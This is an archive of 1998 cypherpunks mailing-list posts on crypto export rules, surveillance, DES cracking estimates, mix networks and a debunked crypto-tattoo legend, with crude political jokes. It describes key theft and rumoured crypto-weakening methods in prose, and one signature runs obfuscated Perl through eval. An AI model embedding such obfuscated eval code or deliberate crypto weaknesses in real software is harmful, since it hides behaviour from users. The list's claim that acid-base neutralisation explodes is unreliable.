minutes after they are taken.

To date, there have been few legal challenges to the use of satellite
imagery. But the technology of overhead photography is evolving faster than
the law. Courts have allowed government officials to take detailed pictures
from airplanes flying as low as 1,200 feet. And in 1986, the U.S. Supreme
Court ruled that the U.S. Environmental Protection Agency was permitted to
photograph a Dow Chemical facility in Midland, Mich., because the EPA used
relatively conventional airplane-camera equipment.

But the high court raised a red flag in that case: "It may well be ... that
surveillance of private property by using highly sophisticated surveillance
equipment not generally available to the public, such as satellite
technology, might be constitutionally proscribed absent a warrant."

The ABA task force is exploring just these questions. Sheldon Krantz, chair
of the task force and a partner at Piper & Marbury LLP in Washington, says
that it will propose in April that law-enforcement agencies be required to
obtain warrants to use "satellite cameras [that] can focus on images of a
few feet across." That standard would probably include most advanced
satellite images, although the task force has yet to agree on more specific
definitions.

"We need to make some big value judgments about these practices before they
become so widespread," says Mr. Krantz.

Some businesses say they welcome oversight from space. Georgia-Pacific
Corp. and other big timber concerns support the Georgia Department of
Revenue's forest survey, saying it will help to disprove accusations that
they have secretly cut trees without paying taxes.

Several small timber owners already have been fined a total of $2,000 in a
test of the statewide program that took place in Wayne County, near
Savannah. And as sharper-resolution photos become available, some Georgia
officials suggest the program could be used to look for objects as small as
backyard porches, to check if homeowners have their construction permits in
order.

<snip>


--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 05:36:54 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: update.356 (fwd)
Message-ID: <199801272132.PAA01922@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From physnews@aip.org Tue Jan 27 15:31:03 1998
Date: Tue, 27 Jan 1998 08:46:26 -0500
From: physnews@aip.org (AIP listserver)
Message-Id: <199801271346.IAA15741@aip.org>
To: physnews-mailing@aip.org
Subject: update.356


PHYSICS NEWS UPDATE                         
The American Institute of Physics Bulletin of Physics News
Number 356 January 27, 1998   by Phillip F. Schewe and Ben Stein

LOCALIZATION OF LIGHT has been achieved by an Amsterdam-
Florence collaboration (contact Ad Lagendijk, adlag@phys.uva.nl). 
Consider the movement of light through a  diffuse medium such as
milk, fog, or sugar.  The light waves scatter repeatedly, and the
transmission of light decreases as the light gets reflected. In the
Amsterdam-Florence experiment something different happens.  By
using a gallium-arsenide powder with a very high index of
refraction but with very low absorption at near infrared (wavelength
of 1064 nm), the researchers were, in a sense, able to get the light
to stand still.  That is, the light waves get into the medium and
bounce around in a standing wave pattern, without being absorbed. 
This is the first example of "Anderson localization" for near-visible
light.  This medium is not what would be called a "photonic
bandgap" material (analogous to a semiconductor for electrons) but
more like a "photonic insulator." (Wiersma et al., Nature, 18/25
December 1997; see also www.aip.org/physnews/graphics)

QUANTUM EVAPORATION occurs in a new experiment when a
beam of phonons (little pulses of sound issuing from a warm
filament) inside a pool of superfluid helium-4 is aimed at the liquid
surface from below.  In analogy with the photoelectric effect (in
which light ejects electrons from a surface), the phonons pop helium
atoms up out of the liquid.  By measuring the momenta of the
phonons and the evaporated atoms, one can determine that the
atoms originally had zero momentum parallel to the surface,
demonstrating directly (for the first time) that the He-4 atoms had
been part of a Bose-Einstein condensate (BEC), in which the atoms
fall into a single quantum state.  Theories of superfluid He-4 had
supposed that the atoms reside in a BEC state, but this had not been
experimentally verified until now.  The researcher, Adrian Wyatt
of the University of Exeter,  believes this method can be used to
generate beams of coherent helium atoms (an "atom laser" effect). 
(Nature, 1 January 1998.)

ANOTHER VERSION OF QUANTUM TELEPORTATION is
being published by researchers in Italy and England (Francesco
DeMartini, University of Rome, demartini@axcasp.caspur.it).  Like
the Innsbruck teleportation scheme published several weeks earlier
(Update 351), this demonstration employs a pair of entangled
photons.   Whereas the Innsbruck experiment teleported the
polarization value of a third, distinct "message photon" to one of
the entangled photons, the Rome scheme encodes one of the
entangled photons with a specific polarization state and transmits
this state to the other entangled photon. Although different from the
Innsbruck experiment (which had a 25% teleportation success rate)
and the original theoretical proposal for teleportation, this scheme
works 100% of the time if the receiver applies the right
transformations on the second photon. (D. Boschi et al., upcoming
article in Physical Review Letters).  In another, theoretical paper,
Sam Braunstein of the University of Wales (Bangor) and Jeff
Kimble of Caltech propose an experimental method for extending
quantum teleportation from transmitting discrete variables such as
polarization to transmitting continuous variables like the amplitude
of the electric field associated with a light wave. (Braunstein et al.,
Phys. Rev. Lett., 26 January 1998.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tony Iannotti <tony@fozzie.secapl.com>
Date: Wed, 28 Jan 1998 04:40:44 +0800
To: Anonymous <anon@anon.efga.org>
Subject: Re: Ultra computer
In-Reply-To: <1c103cd4daa62b5cabf50f16f87903e1@anon.efga.org>
Message-ID: <Pine.A41.3.96.980127153057.36644i-100000@fozzie.secapl.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Jan 1998, Anonymous wrote:

> Go back to the sushi bar and read your English book. Chop chop.

Although I would have preferred a web cite, and harder performance specs,
I think the information is relevant to advancing cryptanalytic hardware
attacks. Accordingly, I go to NEC website now myself, chop chop. (Don't
care about Misty anymore, and regurgitating Tim's Japan-speak caricature
isn't furthering anything.)


> >Ultra computer which NEC had the calculation speed of the world
> >maximum of about 1000 times of the super computer to was decided
> >to be developed.
> >Ultra computer will be completed in 2001.
> >It has the performance that the calculation which takes 10000 years
> >with the personal computer is made of 3, 4 days.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 28 Jan 1998 04:48:01 +0800
To: cypherpunks@cyberpass.net
Subject: Privacy and presidential philandering, from the Netly News
Message-ID: <v03007801b0f3f7d0a33d@[204.254.22.18]>
MIME-Version: 1.0
Content-Type: text/plain



********

http://cgi.pathfinder.com/netly/opinion/0,1042,1714,00.html

The Netly News (http://netlynews.com/)
January 27, 1998

Private Parts
by Declan McCullagh (declan@well.com)

       Already you can hear the plaintive sound of President Clinton's
   partisans whining about privacy. The allegations about Will's
   wandering willy are too intimate, too sensitive and (if the truth be
   told) too embarrassing to be discussed publicly, they claim.

       Yesterday the wire services were busy recycling Hillary Clinton's
   plea for a "zone of privacy"; a Clinton defender wrote in USA Today
   that nobody should be "inflicting the details of his sex life on the
   public"; a piece in the New York Times complained about a "fishing
   expedition into the President's sexual history." On NBC's Today show,
   Hillary groused about living in "a time where people are malicious and
   evil-minded."

       On many electronic mailing lists, the talk nowadays seems to be of
   little else. "The current pursuit of Clinton -- whatever the facts
   turn out to be -- strikes me, itself, as an obscenity," griped Edward
   Kent on a First Amendment list. "We need more protections of privacy
   in this country." Michael Troy replied, "I don't think there is a
   constitutional right to privacy for an employer (who is also a public
   figure) having sex with an employee in the workplace."

        He's right. The call for greater "privacy protections" is a call
   for censorship in disguise.

[...]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <bubbabill@whitehouse.gov>
Date: Wed, 28 Jan 1998 05:59:06 +0800
To: <cypherpunks@cyberpass.net>
Subject: New Plan for America!!!!!
Message-ID: <199801272150.PAA17408@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain



Tonight at the State of the Union I will announce my new plan for America -
"Swallow the Leader"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 27 Jan 1998 23:03:15 +0800
To: tomw@netscape.com
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <34CD53FD.363A9C8C@netscape.com>
Message-ID: <199801271453.PAA17516@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 07:26 PM 1/26/98 -0800, Tom Weinstein  wrote:
>Markus Kuhn wrote:
>> root wrote on 1998-01-23 01:29 UTC:
>>
>>> [Press Releases]
>>> http://www.netscape.com/newsref/pr/newsrelease558.html?cp=nws01flh1
>>>
>>> NETSCAPE ANNOUNCES PLANS TO MAKE NEXT-GENERATION COMMUNICATOR SOURCE
>>> CODE AVAILABLE FREE ON THE NET
>> 
>
>Don't hold your breath.  We're still bound by US export regulations, so
>we won't be able to export crypto-relevant source code.  We'll release what
>we can, but you probably won't be satisfied.
>
>Of course, there's always the option for some enterprising individuals
>outside the US to replace the missing pieces.

Or you can print those sections in a book and let some enterprising
foreigners OCR scan them.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 28 Jan 1998 06:10:12 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: [Fwd: Check this out!] (fwd)
Message-ID: <199801272206.QAA02182@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From stugreen@bga.com Tue Jan 27 16:01:14 1998
Sender: root@coney.lsd-labs.com
Message-ID: <34CE5A63.9D29DD2@bga.com>
Date: Tue, 27 Jan 1998 16:06:27 -0600
From: Stu Green <stugreen@bga.com>
X-Mailer: Mozilla 3.01GoldC-Caldera (X11; I; Linux 2.0.33 i586)
MIME-Version: 1.0
To: ravage@ssz.com
Subject: [Fwd: Check this out!]
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: from mail1.realtime.net (mail1.realtime.net [205.238.128.217]) by zoom.bga.com (8.6.12/8.6.12) with SMTP id MAA14988 for <stugreen@bga.com>; Tue, 27 Jan 1998 12:39:17 -0600
Received: (qmail 13392 invoked from network); 27 Jan 1998 18:39:14 -0000
Received: from isdn5-69.ip.realtime.net (HELO bga.com) (205.238.160.69)
  by mail1.realtime.net with SMTP; 27 Jan 1998 18:39:14 -0000
Message-ID: <34CE2AD0.F3822BFE@bga.com>
Date: Tue, 27 Jan 1998 12:43:28 -0600
From: David Neeley <dneeley@bga.com>
X-Mailer: Mozilla 4.04 [en] (Win95; I)
MIME-Version: 1.0
To: stugreen@bga.com
Subject: Check this out!
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

In case you don't get an e-mail newsletter called "Tasty Bits from the
Technology Front" I offer for your enjoyment:


..A warning on Microsoft (in)security

  Basic crypto weakness undermines all claims to security, expert
  says

    Longtime readers know that TBTF has been reporting on security weak-

    nesses in Microsoft's products, particularly Internet Explorer, for
    more than a year [25]. Now a security expert from New Zealand, Peter

    Gutmann, has posted a paper [26] claiming that the flaws are so ser-

    ious that Windows 95 users should entirely refrain from using the
    Web. Among the problems Gutmann points out is a critical weakness in

    the way Microsoft software protects (or does not protect) users'
    master encryption key; this weakness undermines all other encryp-
    tion components in Web servers and browsers. Gutmann outlines how a
    cracker could quietly retrieve the private key from a victim's ma-
    chine and break the encryption that "protects" it in a matter of
    seconds. The attacker has, Gutmann says, then "effectively stolen
    [the user's] digital identity, and can use it to digitally sign
    contracts and agreements, to recover every encryption session key
    it has ever protected in the past and will ever protect in the
    future, to access private and confidential email, and so on."
    TechWeb coverage is here [27].

    [25] http://www.tbtf.com/resource/ms-sec-exploits.html
    [26] http://www.cs.auckland.ac.nz/~pgut001/pubs/breakms.txt
    [27] http://www.techweb.com/wire/story/TWB19980123S0007







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Blair <jdblair@frodo.tucc.uab.edu>
Date: Wed, 28 Jan 1998 06:30:12 +0800
To: cypherpunks@cyberpass.net
Subject: opinion of Crypt::DES & Crypt::IDEA
Message-ID: <199801272221.QAA16124@frodo.tucc.uab.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----



Hello,

Does anybody on this list have an opinion of the quality of the 
Crypt::DES and Crypt::IDEA perl modules?  I'm concerned with whether 
or not the modules use electronic code book instead of cipher block 
chaining encryption mode.  The documentation does not make this 
clear.  If nobody knows the answer to this I'll figure it out from 
the source code.  However, I suspected I could save some time by 
asking here.

Besides this question, does anybody have an opinion of the quality of 
these routines?  I'm not asking for opinions regarding the quality or 
lack of quality of DES or IDEA, but of these particular 
implementations.

thanks much,
 -john.


......................................................................
.                                                                    .
.....John.D.Blair...   mailto:jdblair@uab.edu   phoneto:205.975.7123 .
                   .   http://frodo.tucc.uab.edu  faxto:205.975.7129 .
 ..sys|net.admin....                                                 .
 .                     the university computer center            .....
 ..... g.e.e.k.n.i.k...the.university.of.alabama.at.birmingham....




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNM5d0QJjTpK3AXhBAQGN6QQAr14AZWWRPrRx4vRMTtecboL66rz2kmby
+d5E1troSBDDvxkdpbsg4PhS05KEDrRJjjoCHUWDQlGeZ5RTsJUCgLOi1plXKsml
K5oDqyEToa7AKazwcPC9DZj8JNf0/oNuZfWKw1cPW4r/QCmZI6DmdDb1xz3OFC+m
7+Okl/YERiU=
=KxmH
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 28 Jan 1998 08:30:49 +0800
To: cypherpunks@toad.com
Subject: Re: Latest Clinton dodge?
In-Reply-To: <Pine.SUN.3.96.980127135805.15074D-100000@beast.brainlink.com>
Message-ID: <q6iZJe1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Arachelian <sunder@sundernet.com> writes:

> 
> On Mon, 26 Jan 1998, Declan McCullagh wrote:
> 
> > 
> > Clinton said this morning:
> > 
> > >>>>
> >  I want you to listen to me.  I'm
> > going to say this again.  I did not have sexual relations with that
> > woman, Miss Lewinsky.  I never told anybody to lie, not a single time
> > -- never.  These allegations are false.
> > <<<<
> > 
> > The question then becomes, of course, what does "sexual relations" mean?
> > 
> > Is it oral sex?
> 
> Next thing you know, he'll say "She gave me a blow job, but didn't
> swallow, so it's not sex." :)

It's true.  Bill came on Monica's (black cocktail) dress.

"There was a girl named Monica
 Who liked to play the harmonica."

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 28 Jan 1998 08:15:10 +0800
To: cypherpunks@cyberpass.net
Subject: ULotD? Cuban Tattoos.
Message-ID: <v04003903b0f40b1b9e35@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



A bit o'apocrypha for a Monday evening...

Cheers,
Bob
--- begin forwarded text


Resent-Date: Tue, 27 Jan 1998 11:27:25 -0500
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Cc: bostic@bsdi.com
Subject: ULotD? Cuban Tattoos.
Date: Tue, 27 Jan 1998 10:14:12 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/2668
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


Forwarded-by: Arunas Norvaisa <arunas@witty.com>

There was a guy in Florida, Cuban by nationality, who had been unable to
get US citizenship and was due to be deported. A couple of MIT students,
who had heard about this guy and were after a lark, hopped a plane down to
Florida and took this guy to a tatoo studio. What they tatooed on to him
was the DES algorithm, in some computer readable form. Thus rendering the
guy unexportable. The US government offered to scrape the tatoos off, but
they guy's lawyers screamed something about human rights abuses.  The way I
heard it, the guy was eventually granted citizenship.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Wed, 28 Jan 1998 06:22:54 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: State of the Union Address
In-Reply-To: <Pine.BSF.3.91.980126093631.12571B-100000@mcfeely.bsfs.org>
Message-ID: <Pine.GSO.3.95.980127171020.11874B-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 26 Jan 1998, Rabid Wombat wrote:

> > > [1] Grab a totally random sample of 100 high school students. Haul the
> > >     students out one at a time and ask them the following questions:
> > [snip]
> > > 11) Michelle mixes one gram of HCl and one half gram of NaOH. Under normal
> > >     circumstances, what is produced and in what quantities?
> > > 
> > 
> > The correct answer is an explosion and a big mess.  One student in my high
> > school chemistry class learned this the hard way.  :)
> > 
> Um, salt water explodes?

>From my high-school chemistry, neutralization makes slatwater and a lot of
heat....  (Or that's what the teacher claimed)... Without a way to dump
the pressure generated this way, yes you could have an explosion...


Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 28 Jan 1998 08:15:11 +0800
To: cypherpunks@cyberpass.net
Subject: Re: ULotD? Cuban Tattoos.
Message-ID: <v04003905b0f40ca8fb98@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Resent-Date: Tue, 27 Jan 1998 14:54:29 -0500
X-Authentication-Warning: qnx.com: localhost [127.0.0.1] didn't use HELO
protocol
To: 0xdeadbeef@substance.abuse.blackdown.org
Cc: bostic@bsdi.com
Subject: Re: ULotD? Cuban Tattoos.
Date: Tue, 27 Jan 1998 13:41:24 -0500
From: glen mccready <glen@qnx.com>
Resent-From: 0xdeadbeef@substance.abuse.blackdown.org
X-Mailing-List: <0xdeadbeef@substance.abuse.blackdown.org> archive/latest/2674
X-Loop: 0xdeadbeef@substance.abuse.blackdown.org
Precedence: list
Resent-Sender: 0xdeadbeef-request@substance.abuse.blackdown.org


From: "Perry E. Metzger" <perry@piermont.com>


The story posted is an urban legend.

It is NOT an urban legend that someone has been tattooed with "RSA in
Perl". A picture of Richard White's tattoo is at:

http:/www.dcs.ex.ac.uk/~aba/rsa/tattoo.html

It is also not entirely an urban legend that this has been joked about
-- a friend of mine (a Greek computer security expert who's name I
won't mention) was forced to spend a couple of years back in Greece
after completing his PhD because of restrictions on his original visa,
and his friends joked heavily about giving him a crypto tatoo to
render him non-exportable. However, it was only a joke (albeit one
that was told regularly in computer security circles because the
person in question is fairly well known among security weenies.)

However, the stated story is completely bogus.

Perry

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Wed, 28 Jan 1998 06:21:46 +0800
To: "'cypherpunks@ssz.com>
Subject: Ultra computer.
Message-ID: <6B5344C210C7D011835C0000F80127668B15FF@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain



I also find the merriment at Nobuki Nakatuji poor English skills
offensive - I wish I spoke Japanese as well as he can write
English.

That's not to say I think we should all go off and work on MISTY
right away.

However, on his 'NEC supercomputer', there's a somewhat low-content
press release at
http://www.nec.co.jp/english/today/newsrel/9801/2101.html

They've been asked to design as 32 TFlop machine, with an aim of
building
it by 2002. It's a highly parallelized vector machine, ostensibly aimed
at 
weather forcasting. It'll have 4 TB of RAM, and 'thousands' of
processors.

I wish I knew just what processor it's supposed to use, but it's
probably only
on paper at the moment.

Here's a really rough calculation

Assume integer instructions are no slower than the FP instructions.

Best DES code for Alpha gets 94 clock cycles/key - guess 200
instructions/key.

2^56 *200 = 1.4e19 instructions
= 450360 seconds
= 125 hours to exhaust key space, or about 2.5/days on average.

even if I'm off by a factor of two, this is pretty quick for a general
purpose machine.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Wed, 28 Jan 1998 08:37:38 +0800
To: freedom-knights@jetcafe.org (Freedom Knights)
Subject: Kooks and their Kookies
Message-ID: <199801280030.SAA20118@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



I have just looked into my cookies file, and noticed an interesting
kookie (pun intended):

www.netscum.net FALSE   /       FALSE   123456789      visited the%20Home%20Page%2c%20Name%20Q.%20Deleted

(Name Deleted is the name of one of the well known USENET personaes,
and there is a number instead of 123456789).

This is really interesting. If netscum.net ever comes up again, do not
view it except through the anonymizer or the crowds, and filter out the
kooks' kookies.

	- Igor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <mail@vipul.net>
Date: Tue, 27 Jan 1998 21:50:33 +0800
To: cypherpunks@cyberpass.net (Cypherpunks)
Subject: Paper withdraws story of Clinton sex 'witness' [fwd - infobeat]
Message-ID: <199801271842.SAA08537@fountainhead.net>
MIME-Version: 1.0
Content-Type: text



*** Paper withdraws story of Clinton sex 'witness'

The Dallas Morning News withdrew its Internet report Tuesday that a
Secret Service agent was ready to testify seeing President Clinton
and Monica Lewinsky in a compromising situation. The Dallas paper
took the report off its online edition and posted a statement saying
its source for the story had told them his information was wrong. The
paper had carried a front page report on its electronic Web site
saying the agent had spoken with independent counsel Kenneth Starr's
staff and was ready to testify as a government witness in the sex
scandal engulfing the White House. But within 4 hours the paper had
pulled the report and replaced it with a statement which said "the
source for the story, a longtime Washington lawyer familiar with the
case, later said the information provided for that report was
inaccurate. See
http://www.infobeat.com/stories/cgi/story.cgi?id=7164923-842
Maryland officials say Tripp may have broken law, See
http://www.infobeat.com/stories/cgi/story.cgi?id=7159919-bc9                             

-- 
#!/usr/bin/perl
eval unpack u,'J)",](DIU<W0@06YO=&AE<B!097)L($AA8VME<EQN(CMP<FEN="!T:6UE'; 

==========================================================================
Vipul Ved Prakash                 | - Electronic Security & Crypto 
mail@vipul.net                    | - Web Objects 
91 11 2233328                     | - PERL Development 
198 Madhuban IP Extension         | - Linux & Open Systems 
Delhi, INDIA 110 092              | - Networked Virtual Spaces





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 28 Jan 1998 10:58:34 +0800
To: cypherpunks@cyberpass.net
Subject: State of the Onion Router Address
In-Reply-To: <199801280225.DAA21669@basement.replay.com>
Message-ID: <v03102803b0f44d6a92d6@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:25 PM -0800 1/27/98, Anonymous wrote:
>>Does anyone happen to know how to figure the energy requirements or yields
>>for a reaction?
>
>Just to make sure I'm not misinterpreted, I mean how much energy is required
>or is liberated by a given reaction. I don't mean "...figure the energy,
>requirements, or yields," or "figure the energy requirements or products it
>yields."

Jeez, this is not "ChemPunks."

Calculating exothermic and endothermic yields (measured in "kcal/mole") for
various chemistry reactions was a central part of my sophomore chemistry
class in high school 30 years ago.

I suggest the question askers consult any of the most basic chemistry
textbooks.

--Tim May

ObUnion: "Union" derives from the same Indo-European root word that gave us
union and unity and yoke in English, yugo in Slavic languages (hence
Yugoslavia), and yoga in Sanskrit.




The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 28 Jan 1998 10:59:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: ULotD? Cuban Tattoos.
In-Reply-To: <v04003903b0f40b1b9e35@[139.167.130.248]>
Message-ID: <v03102804b0f44f13f6ad@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 2:08 PM -0800 1/27/98, Robert Hettinga wrote:
>A bit o'apocrypha for a Monday evening...

>Forwarded-by: Arunas Norvaisa <arunas@witty.com>
>
>There was a guy in Florida, Cuban by nationality, who had been unable to
>get US citizenship and was due to be deported. A couple of MIT students,
>who had heard about this guy and were after a lark, hopped a plane down to
>Florida and took this guy to a tatoo studio. What they tatooed on to him
>was the DES algorithm, in some computer readable form. Thus rendering the
>guy unexportable. The US government offered to scrape the tatoos off, but
>they guy's lawyers screamed something about human rights abuses.  The way I
>heard it, the guy was eventually granted citizenship.

Utter bullshit.

Extraordinary jokes require extraordinary proof.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 28 Jan 1998 08:06:01 +0800
To: cypherpunks@toad.com
Subject: RE: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <1.5.4.32.19980128000207.00b86e10@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



On "using honey not vinegar" rationale of RPK InvisiMail for
obtaining crypto export licenses:

Applied Cryptography, Bruce Schneier, 2nd Edition, pp. 215-16

Algorithms for Export

Algorithms for export out of the United States must be approved 
by the U.S. government (actually, by the NSA--see Section 25.1)
It is widely believed that these export-approved algorithms can 
be broken by the NSA. Although no one has admitted this on the 
record, these are some of the things the NSA is rumored to privately
suggest to companies wishing to export their cryptographic products:

  - Leak a key bit once in a while, embedded in the ciphertext.

  - "Dumb down" the effective key to something in the 30-bit range. 
  For example, while the algorithm might accept a 100-bit key, most 
  of those keys might be equivalent.

  - Use a fixed IV, or encrypt a fixed header at the beginning of 
  each encrypted message. This facilitates a known-plaintext attack.

  - Generate a few random bytes, encrypt them with the key, and then
  put both the plaintext and the ciphertext of those random bytes at 
  the beginning of the encrypted message. This also facilitates a 
  known-plaintext attack.

NSA gets a copy of the source code, but the algorithm's details remain 
secret from everyone else. Certainly no one advertises any of these 
deliberate weaknesses, but beware if you buy a U.S. encryption product 
that has been approved for export.

-----

Bruce added the last "beware" phrase to the 2nd edition.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 28 Jan 1998 11:16:14 +0800
To: cypherpunks@Algebra.COM
Subject: Re: future proofing algorihtms
In-Reply-To: <199801221532.JAA28790@email.plnet.net>
Message-ID: <v03102805b0f4501f35a7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:18 PM -0800 1/25/98, Adam Back wrote:

>Repeat to get back to originator.  If we assume 100 message pool size
>(probably generous) and chain of length 10, that is 1000 decryptions
>which adds equivalent to 10 bits worth of symmetric key size.
>
>Paranoid stuff yes, but the NSA mixmaster traffic archive doesn't seem
>that unlikely.
>
>It is interesting to note that Tim May's recent suggestion of LAM
>(Local Area Mixes) would help here because if 5 of those mixmaster
>nodes where part of a LAM, it is unlikely that the NSA would be able
>to archive inter remailer traffic, thus increasing effective pool size
>to 100^5.  So one advantage of the LAM approach is that it provides
>links which are protected by physical security.

This is a big part of the LAM motivation: to grossly complicate the task of
observers watching the traffic. If SWAN or PipeNet is adopted, this
obviates this point, but neither seems likely anytime soon.

A LAM approach is low tech, and can be implemented easily enough. (And
PipeNet becomes much more feasible...)

Even an adventurous company, with many machines on various networks, could
deploy a LAM on their network.

(Though the laws about corporate culpability are written in ways that a
Silicon Graphics or Sun or C2Net would have much to fear in having their
corporate network associated with a LAM of any sort. Hence my point about
many and varied residential users in a physical building being the LAM
nodes.)

Another point about LAMs is that they are useful as "concentrators" for
PipeNet connections. To wit,

Suppose someone has deployed a PipeNet connection to another node. Fine,
but the NSA and Mossad and GCHQ and other enemies of freedom may watch the
traffic flowing into the node feeding that PipeNet connection.

So why not do a better job of "loading" this PipeNet connection by having a
LAM at the site? Then, watchers see the stuff flowing into the LAM, and
have less idea (correlation-wise) of what's then making use of the PipeNet
connection.

(There are arguments that PipeNet would be immune to this type of
correlation, in that a single node feeding a PipeNet connection is as good
as N nodes. The devil's in the details. I argue that a LAM feeding a
PipeNet connection is at least as secure against monitoring as a single
node feeding a PipeNet, and possibly more secure, practically speaking.)

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
